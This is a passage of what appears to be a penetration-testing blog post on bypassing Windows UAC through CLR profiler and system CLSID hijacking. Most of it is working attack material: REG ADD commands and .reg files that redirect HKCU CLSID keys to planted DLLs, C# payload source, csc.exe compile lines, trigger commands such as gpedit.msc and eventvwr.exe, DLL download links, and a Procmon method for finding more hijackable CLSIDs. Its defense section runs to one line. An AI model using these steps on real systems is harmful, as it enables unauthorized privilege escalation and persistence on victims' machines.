REG_SZ \u002Fd \"{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\" \u002Ff\u003Cbr>REG ADD \"HKCU\\Environment\" \u002Fv \"COR_ENABLE_PROFILING\" \u002Ft REG_SZ \u002Fd \"1\" \u002Ff\u003Cbr>REG ADD \"HKCU\\Environment\" \u002Fv \"COR_PROFILER_PATH\" \u002Ft REG_SZ \u002Fd \"C:\\Temp\\test.dll\" \u002Ff\u003Cbr>mmc gpedit.msc\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Personally, I believe there is no need to specify the environment variable COR_PROFILER_PATH. The refined POC is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKCU\\Software\\Classes\\CLSID\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\\InprocServer32\" \u002Fve \u002Ft REG_EXPAND_SZ \u002Fd \"C:\\test\\calc.dll\" \u002Ff\u003Cbr>REG ADD \"HKCU\\Environment\" \u002Fv \"COR_PROFILER\" \u002Ft REG_SZ \u002Fd \"{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\" \u002Ff\u003Cbr>REG ADD \"HKCU\\Environment\" \u002Fv \"COR_ENABLE_PROFILING\" \u002Ft REG_SZ \u002Fd \"1\" \u002Ff\u003Cbr>mmc gpedit.msc\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The test DLL is still based on the standard C++ DLL template. Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.dll\u003C\u002Fp>\u003Cp>gpedit.msc will launch normally while calculator pops up with high privileges\u003C\u002Fp>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017319428_0_57a3fcdd7d-1.jpeg\">\u003C\u002Fp>\u003Cp>To only launch calculator without executing gpedit.msc, add ExitProcess(0); after the startup code WinExec(\"calc.exe\",SW_SHOWNORMAL);\u003C\u002Fp>\u003Cp>The compiled DLL has been uploaded. Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.dll\u003C\u002Fp>\u003Cp>Test result as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017363111_1_62fabad8c3-1.jpeg\">\u003C\u002Fp>\u003Cp>Calculator runs with high privileges, successfully bypassing UAC\u003C\u002Fp>\u003Ch2>0x03 Hijacking System CLSID to Bypass UAC\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>clem@clavoillotte shared in a blog how to hijack system CLSID to achieve UAC bypass, so next we will test them one by one and mark points that need attention\u003C\u002Fp>\u003Ch3>1. {B29D466A-857D-35BA-8712-A758861BFEA1}\u003C\u002Fh3>\u003Cp>The registry file is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Windows Registry Editor Version 5.00\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{B29D466A-857D-35BA-8712-A758861BFEA1}]\u003Cbr>@=\"Microsoft.GroupPolicy.AdmTmplEditor.GPMAdmTmplEditorManager\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{B29D466A-857D-35BA-8712-A758861BFEA1}\\Implemented Categories]\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{B29D466A-857D-35BA-8712-A758861BFEA1}\\Implemented Categories\\{62C8FE65-4EBB-45E7-B440-6E39B2CDBF29}]\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{B29D466A-857D-35BA-8712-A758861BFEA1}\\InprocServer32]\u003Cbr>@=\"C:\\\\Windows\\\\System32\\\\mscoree.dll\"\u003Cbr>\"Assembly\"=\"TestDotNet, Version=0.0.0.0, Culture=neutral\"\u003Cbr>\"Class\"=\"TestDotNet.Class1\"\u003Cbr>\"RuntimeVersion\"=\"v4.0.30319\"\u003Cbr>\"ThreadingModel\"=\"Both\"\u003Cbr>\"CodeBase\"=\"file:\u002F\u002FC:\u002F\u002FTemp\u002F\u002Ftest_managed.dll\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{B29D466A-857D-35BA-8712-A758861BFEA1}\\InprocServer32\\10.0.0.0]\u003Cbr>\"Assembly\"=\"TestDotNet, Version=0.0.0.0, Culture=neutral\"\u003Cbr>\"Class\"=\"TestDotNet.Class1\"\u003Cbr>\"RuntimeVersion\"=\"v4.0.30319\"\u003Cbr>\"CodeBase\"=\"file:\u002F\u002FC:\u002F\u002FTemp\u002F\u002Ftest_managed.dll\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{B29D466A-857D-35BA-8712-A758861BFEA1}\\ProgId]\u003Cbr>@=\"Microsoft.GroupPolicy.AdmTmplEditor.GPMAdmTmplEditorManager\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The entry @=\"Microsoft.GroupPolicy.AdmTmplEditor.GPMAdmTmplEditorManager\" in the registry indicates that this CLSID is invoked when executing gpedit.msc\u003C\u002Fp>\u003Cp>The C# code to generate test_managed.dll is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Diagnostics;\u003Cbr>\u003Cbr>namespace TestDotNet\u003Cbr>{\u003Cbr>   public class Class1\u003Cbr>   {\u003Cbr>      static Class1()\u003Cbr>      { \u003Cbr>         Process.Start(\"calc.exe\");\u003Cbr>         Environment.Exit(0);\u003Cbr>      }\u003Cbr>   }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Save as TestDotNet.cs and compile into a dll\u003C\u002Fp>\u003Cp>Use csc.exe to compile and generate the dll:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe \u002Ft:library TestDotNet.cs\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Use csc.exe from the .Net 4.0 directory\u003C\u002Fp>\u003Cp>Rename the generated TestDotNet.dll to test_managed.dll to successfully bypass UAC, as shown in the test below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017392067_2_13794b1558-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Additional tip regarding C# compilation files:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When compiling a C# program using Visual Studio, if the project name does not match the assembly name (i.e., the namespace) (in this context, the assembly name in the code is TestDotNet, but the newly created project name is Class1), you need to reassign the assembly name, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017420006_3_264622af73-1.jpeg\">\u003C\u002Fp>\u003Cp>Similarly, this issue also exists when using csc.exe to compile and generate files\u003C\u002Fp>\u003Cp>For example, if the source code is saved as a.cs, then when outputting, you must add the \u002Fout parameter to specify the output file as TestDotNet.dll, so that the assembly name also defaults to TestDotNet (matching the source code). The specific parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe \u002Ft:library \u002Fout:TestDotNet.dll a.cs\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Otherwise, although the dll can be loaded, it cannot be executed, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017463191_4_53a62cc984-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. {D5AB5662-131D-453D-88C8-9BBA87502ADE}\u003C\u002Fh3>\u003Cp>The registry file is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Windows Registry Editor Version 5.00\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{D5AB5662-131D-453D-88C8-9BBA87502ADE}]\u003Cbr>@=\"Microsoft.ManagementConsole.Advanced.FrameworkSnapInFactory\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\\Implemented Categories]\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\\Implemented Categories\\{62C8FE65-4EBB-45e7-B440-6E39B2CDBF29}]\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\\InprocServer32]\u003Cbr>@=\"C:\\\\Windows\\\\System32\\\\mscoree.dll\"\u003Cbr>\"Assembly\"=\"TestDotNet, Version=0.0.0.0, Culture=neutral\"\u003Cbr>\"Class\"=\"TestDotNet.Class1\"\u003Cbr>\"RuntimeVersion\"=\"v2.0.50727\"\u003Cbr>\"ThreadingModel\"=\"Both\"\u003Cbr>\"CodeBase\"=\"file:\u002F\u002FC:\u002F\u002FTemp\u002F\u002Ftest_managed.dll\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\\InprocServer32\\3.0.0.0]\u003Cbr>\"Assembly\"=\"TestDotNet, Version=0.0.0.0, Culture=neutral\"\u003Cbr>\"Class\"=\"TestDotNet.Class1\"\u003Cbr>\"RuntimeVersion\"=\"v2.0.50727\"\u003Cbr>\"CodeBase\"=\"file:\u002F\u002FC:\u002F\u002FTemp\u002F\u002Ftest_managed.dll\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>In the registry key, @=\"Microsoft.ManagementConsole.Advanced.FrameworkSnapInFactory\". The following commands will invoke this CLSID when executed:\u003C\u002Fp>\u003Cul>\u003Cli>compmgmt.msc\u003C\u002Fli>\u003Cli>eventvwr.msc\u003C\u002Fli>\u003Cli>secpol.msc\u003C\u002Fli>\u003Cli>taskschd.msc\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Compile the DLL using csc.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe \u002Ft:library TestDotNet.cs\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The DLL must be compiled using .NET 2.0\u003C\u002Fp>\u003Ch3>3. {0A29FF9E-7F9C-4437-8B11-F424491E3931}\u003C\u002Fh3>\u003Cp>The registry file is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Windows Registry Editor Version 5.00\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}]\u003Cbr>@=\"NDP SymBinder\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\InprocServer32]\u003Cbr>@=\"C:\\\\Windows\\\\System32\\\\mscoree.dll\"\u003Cbr>\"ThreadingModel\"=\"Both\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\InprocServer32\\4.0.30319]\u003Cbr>@=\"4.0.30319\"\u003Cbr>\"ImplementedInThisVersion\"=\"\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\ProgID]\u003Cbr>@=\"CorSymBinder_SxS\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\Server]\u003Cbr>@=\"C:\\\\Temp\\\\test_unmanaged.dll\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The test systems were Win7 and Win10, which were unsuccessful, so I modified the script. The modified file is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Windows Registry Editor Version 5.00\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}]\u003Cbr>@=\"NDP SymBinder\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\InprocServer32]\u003Cbr>@=\"C:\\\\Temp\\\\test_unmanaged.dll\"\u003Cbr>\"ThreadingModel\"=\"Both\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The test_unmanaged.dll here differs from those in steps 1 and 2; a standard DLL is required here to achieve DLL hijacking. DLL download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.dll\u003C\u002Fp>\u003Cp>Executing any of the following code can trigger DLL hijacking and achieve UAC bypass:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\System32\\eventvwr.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>or\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\System32\\mmc.exe CompMgmt.msc\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This exploitation method was also introduced by b33f@FuzzySecurity at DefCon25. For details, refer to the following link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.com\u002FFuzzySecurity\u002FDefCon25\u002Fmaster\u002FLab-Writeup.txt\u003C\u002Fp>\u003Ch3>4、{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\u003C\u002Fh3>\u003Cp>The registry file is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Windows Registry Editor Version 5.00\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}]\u003Cbr>@=\"Microsoft Common Language Runtime Meta Data\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\\InprocServer32]\u003Cbr>@=\"C:\\\\Windows\\\\System32\\\\mscoree.dll\"\u003Cbr>\"ThreadingModel\"=\"Both\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\\InprocServer32\\4.0.30319]\u003Cbr>@=\"4.0.30319\"\u003Cbr>\"ImplementedInThisVersion\"=\"\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\\ProgID]\u003Cbr>@=\"CLRMetaData.CorRuntimeHost.2\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\\Server]\u003Cbr>@=\"..\\\\..\\\\..\\\\..\\\\Temp\\\\test_unmanaged.dll\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The test_unmanaged.dll here differs from those in steps 1 and 2; a standard DLL is required here to implement DLL hijacking. DLL download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.dll\u003C\u002Fp>\u003Cp>Execute secpol.msc to trigger DLL hijacking, test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017479501_5_7baf470e02-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x04 Supplement\u003C\u002Fh2>\u003Cp>Use Procmon to record the startup process of gpedit.msc, search for exploitable system CLSIDs, with the following characteristics:\u003C\u002Fp>\u003Cp>Open registry key HKCU:\\Software\\Classes\\CLSID\\{****}\\InprocServer32, returns NAME NOT FOUND\u003C\u002Fp>\u003Cp>Open registry key HKCR:\\CLSID\\{****}\\InprocServer32, returns SUCCESS\u003C\u002Fp>\u003Cp>As shown in the figure below, the marked CLSIDs meet the requirements\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017488625_6_3092b7c810-1.jpeg\">\u003C\u002Fp>\u003Cp>On the test system Win7 x86, the following CLSIDs meeting the requirements were found:\u003C\u002Fp>\u003Cul>\u003Cli>{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}\u003C\u002Fli>\u003Cli>{B708457E-DB61-4C55-A92F-0D4B5E9B1224}\u003C\u002Fli>\u003Cli>{871C5380-42A0-1069-A2EA-08002B30309D}\u003C\u002Fli>\u003Cli>{D02B1F72-3407-48ae-BA88-E8213C6761F1}\u003C\u002Fli>\u003Cli>{B29D466A-857D-35BA-8712-A758861BFEA1}\u003C\u002Fli>\u003Cli>{D02B1F73-3407-48AE-BA88-E8213C6761F1}\u003C\u002Fli>\u003Cli>{B0395DA5-6A15-4E44-9F36-9A9DC7A2F341}\u003C\u002Fli>\u003Cli>{ADE6444B-C91F-4E37-92A4-5BB430A33340}\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Monitor the creation and modification of key values under HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ in the registry\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Microsoft does not consider UAC bypass as a vulnerability, which is understandable from their perspective. However, in penetration testing, situations often arise where UAC bypass is necessary, and certain UAC bypass methods can even be leveraged for further exploitation. From a defensive standpoint, it is important to remind defenders to stay vigilant about UAC bypass techniques.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1129,"Onedaysec",5,"published","2026-02-02T07:51:00.263Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Bypass UAC with CLR Hijacking & System CLSID Exploits","UAC bypass, CLR hijacking, .Net security, privilege escalation, CLSID exploit, Windows security, persistence, gpedit.msc, admin rights",null,false,[],{"docs":43,"hasNextPage":40},[44,4,45,46],456,454,453,{"title":39,"description":39,"image":39},"2026-07-24T15:37:13.225Z","2026-07-23T16:01:37.321Z","draft","2026-07-23T16:06:27.770Z"]